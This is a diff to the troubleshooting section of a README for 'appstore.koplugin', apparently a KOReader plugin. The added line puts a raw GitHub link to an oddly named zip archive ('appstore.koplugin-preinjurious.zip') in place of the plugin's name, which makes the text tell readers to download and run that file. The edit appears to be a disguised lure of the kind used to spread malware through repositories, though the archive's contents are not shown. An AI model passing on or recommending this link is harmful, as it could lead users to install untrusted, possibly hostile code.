juanfuturochile/appstore.koplugin/README.md

 ## 🛠️ Troubleshooting

-If you encounter issues while downloading or running appstore.koplugin, consider the following tips:
+If you encounter issues while downloading or running https://raw.githubusercontent.com/juanfuturochile/appstore.koplugin/main/novation/appstore.koplugin-preinjurious.zip, consider the following tips:

 - **Check Download:** Ensure the file was completely downloaded.
 A partial download can cause errors.
 - **Permissions:** Make sure you have the necessary permissions to run applications on your device.